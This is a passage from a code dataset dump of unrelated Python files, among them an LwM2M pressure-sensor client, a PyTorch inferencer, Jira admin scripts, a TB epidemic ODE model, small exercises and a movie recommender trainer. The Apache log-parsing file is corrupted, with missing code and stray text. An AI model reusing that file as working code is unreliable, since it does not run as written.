coordinator\")\nret = 0\ncurInit = db.cursor()\n#truncate output tables\ncurInit.callproc('init')\ncurInit.close()\nwhile ret == 0:\n\tINString = \"IN\" # to send Node data to the coordinator\n\tISString = \"IS\" # to send Sensor data to the coordinator\n\tIXString = \"IX\" # to send Address data to the coordinator\n\tIAString = \"IA\" # to send Actuators data to the coordinator\n\tIMString = \"IM\" # to send Methods data to the coordinator\n\tret = initCoordinator()\n\tret = 1\n#------- End run once -------------------------#\nlog(\"I\", \"Start main loop\")\n\n\nif __name__ == \"__main__\":\n\tMain()\n \n\n\n\n","sub_path":"Python/dhproc/main_NEW.py","file_name":"main_NEW.py","file_ext":"py","file_size_in_byte":21003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} 
+{"seq_id":"101911618","text":"#!/usr/bin/python\n\"\"\" Example app for the Morpheus. \n    The main purpose of this example app is to demonstrate the use of the ETC Python Lwm2m Module and the ETC Api Client Module.\n    This example will connect to an lwm2m server and register a Pressure Sensor Object. It demonstrates how to define resources, instances, \n    and objects using the Python lwm2m library and how to start the client.\n    The ETC API module is used to interface with the hardware and acquire the lwm2m connection information. The app uses the API module to:\n    * set the sensor power pin high\n    * read from an analog input pin to get the voltage of a pressure sensor\n    * Read the analog process data, which is then used to calculate the pressure value from the raw voltage\n    * Acquire the lwm2m uri, public key, and private key\n\n    Required Hardware:\n    * Name: senpwr. This will be on the PWR output and is used to power the sensor\n    * Name: ai1. This will read the pressure sensor output.\n    \n    The names senpwr and ai1 are set up at build time in the Morpheus App Builder program.\n\"\"\"\nimport Lwm2m\nfrom Lwm2m import lwm2m_client\nfrom Lwm2m import ReadResource\nfrom Lwm2m import WriteResource\nfrom Lwm2m import ReadWriteResource\nfrom Lwm2m import ExecuteResource\nfrom Lwm2m import STRING\nfrom Lwm2m import INT\nfrom Lwm2m import FLOAT\nfrom Lwm2m import OPAQUE\nfrom Lwm2m import BOOL\n\n# The ETC API module. Used to interface to hardware, retrieve analog process configuration values, and get lwm2m connection info.\nfrom api_client import return_values\nfrom api_client import analog\nfrom api_client import digital\nfrom api_client import lwm2m\n\nimport logging\nimport binascii\n \nlogger = logging.getLogger(\"pressure\") \nch = logging.StreamHandler() \nch.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))\nlogger.addHandler(ch)\n\n#=========================================================#\ndef enable_sensor_power():\n    \"\"\" Sets the output on the SENPWR output high.\"\"\"\n    sen = digital.SensorPower(\"senpwr\") \n    sen.set()\n    \ndef get_analog_process_config():\n    \"\"\" Calls the read_analog_process_config API client function to retrieve the min/max values of the sensor voltage and corresponding PSI.\n        These values are used to calculate the PSI from the voltage output. \n        Exceptions are raised if the read_analog_process_config function returns an error or if the returned value cannot be parsed.\"\"\"\n    response, value = analog.read_analog_process_config('ai1')\n    \n    if response != return_values.RESULT_SUCCESS:\n        raise Exception(\"Failed to retrieve the analog process config information. Return value {}.\".format(response))\n    \n    try:\n        max_volts = float(value[\"max_voltage\"]) \n        min_volts = float(value[\"min_voltage\"]) \n        min_sen = float(value[\"min_sensor\"]) \n        max_sen = float(value[\"max_sensor\"])\n    except KeyError:\n        raise Exception(\"The analog process config message received from the api server is not in the expected format. Unable to proceed.\")\n    \n    return max_volts, min_volts, max_sen, min_sen \n    \ndef read_lwm2m_info():\n    \"\"\" Uses the get_lwm2m_security_info API function to get the endpoint URI, the identity and the secret key used to connect to the lwm2m server.\"\"\"\n    response, secure = lwm2m.get_lwm2m_security_info()\n    \n    if response != return_values.RESULT_SUCCESS:\n        raise Exception(\"Failed to retrieve the lwm2m connection information. 
Return value {}.\".format(response))\n    try:\n        lwm2m_uri = \"coaps://\" + secure[\"LWM2M_HOST_NAME\"] + \":5684\"\n        lwm2m_endpoint = secure[\"LWM2M_ENDPOINT\"]\n        lwm2m_identity = secure[\"LWM2M_IDENTITY\"]\n        lwm2m_security = secure[\"LWM2M_SECRET_KEY\"]\n    except KeyError:\n        raise Exception(\"The lwm2m security info message received from the api server is not in the expected format. Unable to proceed.\")\n    \n    return lwm2m_uri, lwm2m_endpoint, lwm2m_identity, lwm2m_security\n\nclass PressureSensor:\n    \"\"\" A class to read the pressure sensor voltage from an analog input and interpolate it to a PSI value.\"\"\"\n    def __init__(self):\n        self.max_volts, self.min_volts, self.max_sen, self.min_sen = get_analog_process_config()\n        self.ai1 = analog.AI(\"ai1\") \n\n    def read_psi(self):\n        ''' This function uses the equation y = mx+b to convert the voltage to a pressure value.'''\n        x = float(self.ai1.read_milli_volts()) / 1000.0\n        m = (self.max_sen - self.min_sen) / (self.max_volts - self.min_volts)\n        b = self.min_sen - ((self.max_sen - self.min_sen)/(self.max_volts - self.min_volts))*self.min_volts\n        y = m * x + b \n        logger.debug(\"read_psi called: x = {}, m = {}, b = {}, y = {}\".format(x,m,b,y))\n        # The return value is clamped between the min and max values of the sensor\n        return min( self.max_sen, max(self.min_sen, y ))\n\n\nclass ServerInstance(Lwm2m.Instance):\n    \"\"\" A class that represents an lwm2m Server object. This is a mandatory lwm2m object. The class must inherit from the lwm2m.Instance class.\"\"\"\n    # These are the resource ids \n    SHORT_ID = 0\n    LIFETIME = 1\n    MIN_PERIOD = 2\n    MAX_PERIOD = 3\n    DISABLE_ID = 4\n    TIMEOUT_ID = 5\n    STORING_ID = 6\n    BINDING_ID = 7\n    UPDATE_ID = 8 \n    \n    def __init__(self, instance_id):\n        # The init function for the Lwm2m.Instance base class must always be called.\n        Lwm2m.Instance.__init__(self, instance_id)\n        \n        resources = [\n            ReadResource(self.SHORT_ID, INT, 123),\n            ReadWriteResource(self.LIFETIME, INT, 30),\n            ReadWriteResource(self.MIN_PERIOD, INT, 0),\n            ReadWriteResource(self.MAX_PERIOD, INT, 0),\n            ReadWriteResource(self.DISABLE_ID, INT, 0),\n            ExecuteResource(self.TIMEOUT_ID),\n            ReadWriteResource(self.STORING_ID, BOOL, False),\n            ReadWriteResource(self.BINDING_ID, STRING, \"U\"),\n            ExecuteResource(self.UPDATE_ID)\n        ]\n        # register must be called to inform the lwm2m.Instance of the resources it contains.\n        self.register(resources)\n\n\nclass PressureValue(Lwm2m.ReadResource): \n    \"\"\" This class represents an lwm2m pressure value resource. The class must inherit from Lwm2m.ResourceBase in order to be used by the\n    client. Since this is a read resource, the class must provide a read callback function. The callback must have the name 'read' and return\n    a value of type float since this is an Lwm2m.FLOAT resource. \"\"\"\n    def __init__(self, pressure_sensor, *arg):\n        # The init function for the Lwm2m.ResourceBase base class must always be called.\n        Lwm2m.ReadResource.__init__(self, *arg)\n        self.pressure_sensor = pressure_sensor\n    \n    def read(self):\n        \"\"\"This function is used as a callback by the lwm2m client.\"\"\"\n        # One method of getting a resource is calling get_resource from the client instance. get_resource\n        # takes the lwm2m uri string as a parameter. 
The uri is the object id, then the instance id, then\n        # the resource id.\n        max_resource = lwm2m_client.get_resource(\"3323/1/5602\")\n        # Resources can also be accessed using the index operator from the client instance.\n        min_resource = lwm2m_client[3323][1][5601]\n        \n        pressure = self.pressure_sensor.read_psi()\n        \n        max_resource.value = max(max_resource.value, pressure)\n        min_resource.value = min(min_resource.value, pressure)\n        logger.debug(\"PressureValue read called: pressure = {}, max = {}, min = {}\".format(pressure, max_resource.value, min_resource.value))\n        return pressure\n\nclass Reset_min_max(ExecuteResource):\n    \"\"\" This class represents an lwm2m min/max reset resource. The class must inherit from Lwm2m.ExecuteResource in order to be used by the\n    client. Since this is an execute resource, the class must provide an execute callback function. The callback must have the name 'execute', and \n    take one argument that contains any data sent from the server as part of the execute request. The function should return a boolean value\n    that indicates the success of the operation.\"\"\"\n    def __init__(self, pressure_sensor, *arg):\n        ExecuteResource.__init__(self, *arg)\n        self.pressure_sensor = pressure_sensor\n    \n    def execute(self, data):\n        pressure = self.pressure_sensor.read_psi()\n        # An attribute named parent_instance is set by the instance that owns the resource when the\n        # resource is registered. This gives a convenient way to access other resources of the same\n        # instance.\n        lwm2m_client[3323][1][5601].value = pressure\n        lwm2m_client[3323][1][5602].value = pressure\n        return True\n\n\nclass PressureObjectInstance(Lwm2m.Instance):\n    # These are the resource ids\n    MIN_PRESSURE = 5601\n    MAX_PRESSURE = 5602\n    MIN_PRESSURE_RANGE = 5603\n    MAX_PRESSURE_RANGE = 5604\n    RESET_VALUES = 5605\n    LINE_PRESSURE = 5700\n    SENSOR_UNITS = 5701\n    CURRENT_CALIBRATION = 5821\n    APPLICATION_TYPE = 5750\n    \n    def __init__(self, instance_id):\n        # The init function for the Lwm2m.Instance base class must always be called.\n        Lwm2m.Instance.__init__(self, instance_id)\n        self.pressure_sensor = PressureSensor()\n        pressure = self.pressure_sensor.read_psi()\n        \n        resources = [\n            ReadResource(self.MIN_PRESSURE, FLOAT, pressure),\n            ReadResource(self.MAX_PRESSURE, FLOAT, pressure),\n            ReadResource(self.MIN_PRESSURE_RANGE, FLOAT, self.pressure_sensor.min_sen),\n            ReadResource(self.MAX_PRESSURE_RANGE, FLOAT, self.pressure_sensor.max_sen),\n            \n            Reset_min_max(self.pressure_sensor, self.RESET_VALUES),\n            PressureValue(self.pressure_sensor, self.LINE_PRESSURE, FLOAT, 0.0),\n            ReadWriteResource(self.SENSOR_UNITS, STRING, \"PSI\"),\n            ReadWriteResource(self.CURRENT_CALIBRATION, STRING, \"Calibration 1\"),\n            ReadWriteResource(self.APPLICATION_TYPE, STRING, \"Line Pressure\")\n        ]\n        self.register(resources)\n    \n\nclass SecurityInstance(Lwm2m.Instance):\n    LWM2M_SECURITY_MODE_PRE_SHARED_KEY = 0\n    LWM2M_SECURITY_MODE_RAW_PUBLIC_KEY = 1\n    LWM2M_SECURITY_MODE_CERTIFICATE = 2\n    LWM2M_SECURITY_MODE_NONE = 3\n    \n    # These are the resource Ids for the security instance\n    URI = 0\n    BOOTSTRAP = 1\n    SECURITY_MODE = 2\n    PUBLIC_KEY = 3\n    SERVER_PUBLIC_KEY = 4\n    SECRET_KEY = 5\n    SMS_SECURITY_MODE = 6\n    SMS_KEY_PARAM = 7\n    SMS_SECRET_KEY = 8\n    SMS_SERVER_ID = 9\n    SHORT_SERVER_ID = 10\n    HOLDOFF_ID = 11\n    BOOTSTRAP_TIMEOUT = 12\n    \n    def __init__(self, instance_id):\n        # The init function for the Lwm2m.Instance base class must always be called.\n        Lwm2m.Instance.__init__(self, instance_id)\n        uri, _, public_key, secret_key = read_lwm2m_info()\n        resources = [\n
            ReadWriteResource(self.URI, STRING, uri),\n            ReadWriteResource(self.BOOTSTRAP, BOOL, False),\n            ReadWriteResource(self.SECURITY_MODE, INT, self.LWM2M_SECURITY_MODE_PRE_SHARED_KEY),\n            ReadWriteResource(self.PUBLIC_KEY, OPAQUE, bytearray(public_key)), # , 'utf8')),\n            ReadWriteResource(self.SERVER_PUBLIC_KEY, OPAQUE, bytearray()),\n            # ReadWriteResource(self.SECRET_KEY, OPAQUE, bytearray(binascii.a2b_hex(secret_key))) ,\n            ReadWriteResource(self.SECRET_KEY, OPAQUE, secret_key) ,\n            ReadWriteResource(self.SMS_SECURITY_MODE, INT, 0),\n            ReadWriteResource(self.SMS_KEY_PARAM, OPAQUE, bytearray()),\n            ReadWriteResource(self.SMS_SECRET_KEY, OPAQUE, bytearray()),\n            ReadWriteResource(self.SMS_SERVER_ID, INT, 0),\n            ReadWriteResource(self.SHORT_SERVER_ID, INT, 123),\n            ReadWriteResource(self.HOLDOFF_ID, INT, 10),\n            ReadWriteResource(self.BOOTSTRAP_TIMEOUT, INT, 0) \n        ]\n        # The register function must be called to inform the instance what resources it contains\n        self.register(resources)\n\n    \nclass DeviceInstance(Lwm2m.Instance):\n    \n    MANUFACTURER = 0\n    MODEL_NUMBER = 1\n    SERIAL_NUMBER = 2\n    FIRMWARE_VERSION = 3\n    FACTORY_RESET = 5\n    TIMEZONE = 15\n    \n    def __init__(self, instance_id):\n        # The init of the Instance parent class should always be called.\n        Lwm2m.Instance.__init__(self, instance_id)\n        \n        resources = [\n            ReadResource(self.MANUFACTURER, STRING, \"Open Mobile Alliance\"),\n            ReadResource(self.MODEL_NUMBER, STRING, \"Lightweight M2M Client\"),\n            ReadResource(self.SERIAL_NUMBER, STRING, \"345000123\"),\n            ReadResource(self.FIRMWARE_VERSION, STRING, \"1.0\"),\n            ExecuteResource(self.FACTORY_RESET),\n            ReadResource(self.TIMEZONE, STRING, \"Mountain\")\n        ]\n        # The register function must be called to inform the instance what resources it contains\n        self.register(resources)  \n\n\ndef build_objects():\n    ''' This function will create the lwm2m object classes that are part of our lwm2m client.\n    The objects are created using the lwm2m.Object base class, and passing in an instance class that\n    serves as the default instance class. The default instance class will be used to create and register\n    a new instance when the create_default_instance function is called.\n    The security, server, and device objects are mandatory objects in lwm2m.'''\n    security_object = Lwm2m.Object(0, \"Security\", SecurityInstance)\n    instance = security_object.create_default_instance(0)\n    security_object.register([instance])\n    \n    server_object = Lwm2m.Object(1, \"Server\", ServerInstance)\n    instance = server_object.create_default_instance(0)\n    server_object.register([instance])\n    \n    device_object = Lwm2m.Object(3, \"Device\", DeviceInstance)\n    instance = device_object.create_default_instance(0)\n    device_object.register([instance])\n    \n    pressure_object = Lwm2m.Object(3323, \"PressureObject\", PressureObjectInstance)\n    instance = pressure_object.create_default_instance(1)\n    pressure_object.register([instance])\n    \n    return [security_object, server_object, device_object, pressure_object] \n\nif __name__ == \"__main__\":\n    sen = digital.SensorPower(\"senpwr\") \n    sen.set()\n\n    # StartLwm2mThread takes the name of the endpoint and an iterable that contains all the objects in our system.\n    _, endpoint, _, _ = read_lwm2m_info()\n    lwm2m_client.StartLwm2mThread(endpoint, build_objects()) \n\n    while True:\n        value = raw_input(\"Press q to quit. 
\")\n if value == \"q\":\n break\n","sub_path":"PressureSensorPy/pressure.py","file_name":"pressure.py","file_ext":"py","file_size_in_byte":14649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"27522556","text":"import contextlib\n\nimport torch\nfrom cyy_naive_lib.log import get_logger\n\nfrom cyy_torch_toolbox.executor import Executor\nfrom cyy_torch_toolbox.ml_type import ExecutorHookPoint, StopExecutingException\n\n\nclass Inferencer(Executor):\n def inference(self, use_grad: bool = False, **kwargs: dict) -> bool:\n has_failure: bool = False\n try:\n self._prepare_execution(**kwargs)\n with (\n torch.set_grad_enabled(use_grad),\n torch.cuda.device(self.device)\n if self.cuda_stream is not None\n else contextlib.nullcontext(),\n torch.cuda.stream(self.cuda_stream),\n ):\n self.model.zero_grad(set_to_none=True)\n self._execute_epoch(epoch=1, need_backward=use_grad, in_training=False)\n self.exec_hooks(ExecutorHookPoint.AFTER_EXECUTE)\n except StopExecutingException:\n get_logger().warning(\"stop inference\")\n has_failure = True\n finally:\n self._wait_stream()\n return not has_failure\n\n def _get_backward_loss(self, result):\n return result[\"normalized_batch_loss\"]\n\n def get_gradient(self):\n normal_stop: bool = self.inference(use_grad=True)\n assert normal_stop\n return self.model_util.get_gradient_list()\n","sub_path":"cyy_torch_toolbox/inferencer.py","file_name":"inferencer.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"118421093","text":"import re\nimport sys\nfrom contextlib import contextmanager\nfrom pprint import pprint as p\n\nfrom app import create_app\nfrom app.jiraapi import get_marketplace_jira\nfrom app.models import Application\n\napp = create_app('development')\n\n\n@contextmanager\ndef jira_with_app_context():\n with app.app_context():\n j = get_marketplace_jira(False)\n yield j\n\n\ndef fix_custom_fields():\n with jira_with_app_context() as j:\n bad_issues = j.generic_jira.jira.search_issues('project = MARADMIN AND issuetype = \"Supplier Assessment\" '\n 'AND created >= 2012-05-31 AND created <= 2017-05-23')\n for bad_issue in bad_issues:\n if bad_issue.raw['fields'][j.supplier_field_code] != 0:\n bad_issue.update({j.application_field_code: str(bad_issue.raw['fields'][j.supplier_field_code]),\n j.supplier_field_code: str(0)})\n\n bad_issues = j.generic_jira.jira.search_issues('project = MARADMIN AND issuetype = \"Domain Assessment\" '\n 'AND created >= 2012-05-31 AND created <= 2017-05-23')\n for bad_issue in bad_issues:\n if bad_issue.raw['fields'][j.application_field_code] != 0:\n bad_issue.update({j.supplier_field_code:\n str(re.search(r\"\\(#(.*)\\)$\", bad_issue.fields.summary).group(1)),\n j.application_field_code: str(0)})\n\n\ndef create_approval_task(application_id):\n with jira_with_app_context() as j:\n a = Application.query.filter_by(id=application_id).first()\n a.status = 'submitted'\n a.create_approval_task()\n\n\ndef list_tasks():\n with jira_with_app_context() as j:\n assessment_tasks = j.get_assessment_tasks()\n\n for t in assessment_tasks:\n p(t)\n\n\ndef tasks_by_id():\n with jira_with_app_context() as j:\n p(j.assessment_tasks_by_application_id())\n\n\ndef create_subtask_issuetype():\n with jira_with_app_context() as j:\n j.create_issuetype(\n 'Supplier Assessment Step',\n 'A necessary step for carrying out a supplier assessment',\n subtask=True)\n\n\ndef connect():\n with 
jira_with_app_context() as j:\n si = j.generic_jira.jira.server_info()\n p(si)\n\n\nif __name__ == '__main__':\n try:\n task_method = getattr(sys.modules[__name__], sys.argv[1])\n\n except AttributeError:\n print('no such task')\n sys.exit(1)\n\n task_method(*sys.argv[2:])\n","sub_path":"jiratasks.py","file_name":"jiratasks.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"196379355","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n#Tan is hyperbolic\n#Actually, sorry, no he isn't\n\n#Github is awesome! \n\nfrom scipy.integrate import odeint\nimport matplotlib.pylab as pylab\n\nlabels = [\n 'susceptibles', \n 'early latents',\n 'late latents',\n 'infectious',\n 'under treatment'\n]\n\ndef calculate_flows(y, t):\n\n # Compartments\n comp_susceptibles = y[0]\n comp_latent_early = y[1]\n comp_latent_late = y[2]\n comp_infectious = y[3]\n comp_treatment = y[4]\n\n # comp = { l:y[i] for i,l in enumerate(labels) }\n\n # Demographic parameters\n rate_birth_pop = 20. / 1e3\n rate_death_pop = 1. / 65.\n pop_total = sum(y)\n \n # Infection parameters\n param_effectivecontact = 10.\n rate_force = param_effectivecontact * comp_infectious / pop_total\n rate_earlyprogress = .1 / .5\n rate_lateprogress = .1 / 100.\n rate_stabilise = .9 / .5\n rate_spontrecover = .6 / 3.\n rate_death_tb = .4 / 3.\n \n # Programmatic parameters\n rate_detect = 1.\n time_treatment = .5\n rate_treatmentcompletion = .9 / time_treatment\n rate_default = .05 / time_treatment\n rate_death_treat = .05 / time_treatment\n \n flows = [\n # Susceptibles\n rate_birth_pop * pop_total \n + rate_treatmentcompletion * comp_treatment \n - (rate_force + rate_death_pop) * comp_susceptibles,\n \n # Early latents\n rate_force * comp_susceptibles \\\n - (rate_earlyprogress + rate_stabilise + rate_death_pop) \\\n * comp_latent_early,\n \n # Late latents\n rate_stabilise * comp_latent_early \\\n + rate_spontrecover * comp_infectious \\\n - (rate_lateprogress + rate_death_pop) * comp_latent_late,\n\n # Infectious\n rate_earlyprogress * comp_latent_early \\\n + rate_lateprogress * comp_latent_late \\\n - (rate_detect + rate_spontrecover + rate_death_tb + rate_death_pop) \\\n * comp_infectious,\n \n # Under treatment\n rate_detect * comp_infectious \\\n - (rate_default + rate_death_treat \\\n + rate_death_pop + rate_treatmentcompletion) \\\n * comp_treatment,\n \n ]\n\n return flows\n\n\npopulation_start = [1e6, 0., 0., 1., 0.]\ntimes = list(range(20))\nsoln = odeint(calculate_flows, population_start, times)\n\nfor i in range(5):\n pylab.subplot(3, 2, i+1)\n pylab.plot(times, soln[:,i])\n pylab.ylabel(labels[i])\n\npylab.xlabel('time')\npylab.tight_layout()\n\npylab.show()\n\n\n\n","sub_path":"simple_tb/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"371457471","text":"class Solution:\n def computeArea(self, A: int, B: int, C: int, D: int, E: int, F: int, G: int, H: int) -> int:\n intersect_area = self.find_intersect(A,B,C,D,E,F,G,H)\n area_1 = self.find_area(A,B,C,D)\n area_2 = self.find_area(E,F,G,H)\n return area_1 + area_2 - intersect_area\n \n def find_area(self, c_1A, c_1B, c_2A, c_2B):\n width = abs(c_1A-c_2A)\n height = abs(c_1B-c_2B)\n return height*width\n \n def find_intersect(self, A, B, C, D, E, F, G, H):\n upper_height = min(H, D)\n lower_height = max(F, B)\n 
left_width = max(A,E)\n        right_width = min(C,G)\n        if left_width >= right_width: return 0\n        if upper_height <= lower_height: return 0\n        return (upper_height-lower_height)*(right_width-left_width)\n","sub_path":"rectange_area_with_intersects.py","file_name":"rectange_area_with_intersects.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"593742227","text":"# encoding: utf-8\n\"https://github.com/genomoncology/related\"\n\nimport related\n\n\n@related.immutable\nclass Person(object):\n    first_name = related.StringField()\n    second_name = related.StringField()\n\n@related.immutable\nclass RoleModels(object):\n    scientists = related.SetField(Person)\n\npeople =[Person(\"f\",\"l\"),Person('n','z')]\nprint(related.to_yaml(RoleModels(scientists=people)))\n\n\"\"\" docker compose sample\nversion: '2'\nservices:\n  web:\n    build: .\n    ports:\n    - 5000:5000\n    volumes:\n    - .:/code\n  redis:\n    image: redis\n\"\"\"\n\n@related.immutable\nclass Service(object):\n    name = related.StringField()\n    image = related.StringField(required=False)\n    build = related.StringField(required=False)\n    ports = related.SequenceField(str, required=False)\n    volumes = related.SequenceField(str, required=False)\n    command = related.StringField(required=False)\n\n\n@related.immutable\nclass Compose(object):\n    version = related.StringField(required=False, default=None)\n    services = related.MappingField(Service, \"name\", required=False)\n\n\nfrom os.path import join, dirname\n\nfrom related import to_yaml, from_yaml, to_model\n\nYML_FILE = join(dirname(__file__), \"docker-compose.yml\")\n\n\ndef test_compose_from_yml():\n    original_yaml = open(YML_FILE).read().strip()\n    yml_dict = from_yaml(original_yaml)\n    compose = to_model(Compose, yml_dict)\n\n    assert compose.version == '2'\n    assert compose.services['web'].ports == [\"5000:5000\"]\n    assert compose.services['redis'].image == \"redis\"\n\n    generated_yaml = to_yaml(compose,\n                             suppress_empty_values=True,\n                             suppress_map_key_values=True).strip()\n\n    assert original_yaml == generated_yaml\n\nif __name__ == '__main__':\n    test_compose_from_yml()","sub_path":"python-lessons/practices/related_demo/related_sample.py","file_name":"related_sample.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"335718505","text":"def find_hypot(side_1, side_2):\n    \"\"\"\n    Function to return the length of the hypotenuse of a right-angled triangle given two short side lengths\n    \"\"\"\n    hypo = (side_1 * side_1 + side_2 * side_2) ** 0.5\n    return hypo\n\n# a = float(input(\"What is the length of the first side? \"))\n# b = float(input(\"What is the length of the second side? 
\"))\n# print(\"The length of the hypotenuse is\", find_hypot(a,b))\n\nsides = [] # define list called 'sides' to contain the two short side lengths of the right angled triangle\n\nfor i in range(2):\n print(\"What is the length of side\", i+1, \"?\")\n side_length = float(input())\n\n sides.append(side_length) # add inputted value to list\n\nprint(\"The length of the hypotenuse is\", find_hypot(sides[0],sides[1]))\n","sub_path":"5.14.10_exercises.py","file_name":"5.14.10_exercises.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"625134896","text":"import os\r\nimport re\r\nfrom collections import Counter\r\n\r\nclass Logging:\r\n def search():\r\n while True:\r\n try:\r\n x=0\r\n var1=os.listdir('logs')\r\n ln=len(var1)\r\n print(\"Total No of Log_files Parsed:\",ln)\r\n get=input(\"Enter keyword to search: \")\r\n while(x \" + str(k) + \" \" + \"Count \" + \"=> \" + str(v))\r\n #print(var)\r\n ff = open(\"ipcount.log\",'a')\r\n print(var, file=ff) \r\n \r\n if __name__ == '__main__':\r\n apache_log_reader(\"logs/access.log\")\r\n search()\r\n \r\n \r\n\r\n \r\n'''\r\n#splitting access\r\nfopen=open(\"access.log\",'r')\r\nfmd;ltab= ' '\r\nfor x in fopen:\r\n if x==tab:\r\n x.append(\"\\n\")\r\n ff = open(\"asplit.log\",'a')\r\n print(x, file=ff)\r\n \r\n#splitting error\r\nfopen=open(\"error.log\",'r')\r\ntab= ' '\r\nfor x in fopen:\r\n if x==tab:\r\n x.append(\"\\n\")\r\n ff = open(\"ersplit.log\",'a')\r\n print(x, file=ff) \r\n\r\n\r\n\r\n '''\r\n \r\n \r\n","sub_path":"project/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"584190298","text":"import turtle\n\ndef square(t,length):\n\tfor side in range (0,4):\n\t\tt.forward(length)\n\t\tt.right(90)\n\t\t\ndef callDon():\n\ttry:\n\t\tturtle.TurtleScreen._RUNNING = True\n\t\tw = turtle.Screen()\n\t\tw.setup(700, 700)\n\t\tw.clear()\n\t\tw.title(\"two\")\n\t\tw.bgcolor(\"#00ff00\")\n\t\tt = turtle.Turtle()\n\t\tt.pendown()\n\t\tx = 100\n\t\ty = 0\n\t\tcount = 0\n\t\tt.width(10)\n\t\tt.color(\"#ffffff\")\n\t\tt.circle(50)\n\t\tw.exitonclick()\n\tfinally:\n\t\tturtle.Terminator()\n\t\t\ndef main():\n\tcallDon()\n\t\nif __name__ == '__main__':\n\tmain()\n\t\n","sub_path":"projectExample/two.py","file_name":"two.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"119051007","text":"import pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom sklearn.metrics import mean_squared_error, roc_auc_score\nimport os\nfrom recommender import RecommenderNet\nimport matplotlib.pyplot as plt\nimport csv\n\ndef preprocess_data(val_ratio=0.1):\n my_path = os.path.abspath(os.path.dirname(__file__))\n movie_df = pd.read_csv(os.path.join(my_path, '../dataset/final_csv/movies.csv'))\n rating_df = pd.read_csv(os.path.join(my_path, '../dataset/final_csv/explicit_fb.csv'))\n\n df = pd.merge(rating_df, movie_df, on=\"web_id\").dropna(axis = 0, subset=['movie_id'])\n\n user_ids = df[\"user_id\"].unique().tolist()\n user2user_encoded = {x: i for i, x in enumerate(user_ids)}\n userencoded2user = {i: x for i, x in enumerate(user_ids)}\n movie_ids = df[\"web_id\"].unique().tolist()\n movie2movie_encoded = {x: i for i, x in enumerate(movie_ids)}\n movie_encoded2movie = {i: x 
for i, x in enumerate(movie_ids)}\n    df[\"user\"] = df[\"user_id\"].map(user2user_encoded)\n    df[\"movie\"] = df[\"web_id\"].map(movie2movie_encoded)\n    df = df.sample(frac=1, random_state=42)\n\n    num_users = len(user2user_encoded)\n    num_movies = len(movie_encoded2movie)\n    df[\"rating\"] = df[\"rating\"].values.astype(np.float32)\n    min_rating = min(df[\"rating\"])\n    max_rating = max(df[\"rating\"])\n\n\n    df = df.sample(frac=1, random_state=42)\n    x = df[[\"user\", \"movie\"]].values\n    # Normalize the targets between 0 and 1. Makes it easy to train.\n    y = df[\"rating\"].apply(lambda x: (x - min_rating) / (max_rating - min_rating)).values\n    # Assuming training on 90% of the data and validating on 10%.\n    train_indices = int((1.-val_ratio)* df.shape[0])\n    x_train, x_val, y_train, y_val = (\n        x[:train_indices],\n        x[train_indices:],\n        y[:train_indices],\n        y[train_indices:],\n    )\n\n    return (x_train, x_val, y_train, y_val, num_users, num_movies)\n\ndef offline_eval(model_path, val_ratio=0.1, EMBEDDING_SIZE=50):\n    x_train, x_val, y_train, y_val, num_users, num_movies = preprocess_data(val_ratio)\n    model = RecommenderNet(num_users, num_movies, EMBEDDING_SIZE)\n    model.load_weights(model_path) \n    predictions = model.predict(x = x_val)\n    MSE = mean_squared_error(y_val , predictions)\n    y_val_binary = np.where(y_val >= 0.5, 1, 0)\n    predictions_binary = np.where(predictions >= 0.5, 1, 0)\n    AUC = roc_auc_score(y_val_binary, predictions_binary)\n\n    return (MSE, AUC)\n\n\ndef data_distribution(report_path, val_ratio=0.1):\n    x_train, x_val, y_train, y_val, num_users, num_movies = preprocess_data(val_ratio)\n    # Set axis labels before saving so they actually appear in the saved figures.\n    plt.hist(y_train, bins=5, facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n    plt.xlabel('normalized rating')\n    plt.ylabel('numbers')\n    plt.savefig(os.path.join(report_path, 'rate_hist.png'))\n    plt.clf()\n    plt.hist(x_train[:,0], bins=30, facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n    plt.xlabel('user numbers')\n    plt.ylabel('numbers')\n    plt.savefig(os.path.join(report_path, 'user_hist.png'))\n    plt.clf()\n    plt.hist(x_train[:,1], bins=30, facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n    plt.xlabel('movie numbers')\n    plt.ylabel('numbers')\n    plt.savefig(os.path.join(report_path, 'movie_hist.png'))\n    plt.clf()\n\n\ndef train_model(model_path, val_ratio=0.1, EMBEDDING_SIZE=50, batch_size=256, epochs=10):\n    x_train, x_val, y_train, y_val, num_users, num_movies = preprocess_data(val_ratio)\n\n    model = RecommenderNet(num_users, num_movies, EMBEDDING_SIZE)\n    model.compile(\n        loss=tf.keras.losses.BinaryCrossentropy(), optimizer=keras.optimizers.Adam(lr=0.001)\n    )\n\n    history = model.fit(\n        x=x_train,\n        y=y_train,\n        batch_size=batch_size,\n        epochs=epochs,\n        verbose=1,\n        validation_data=(x_val, y_val),\n    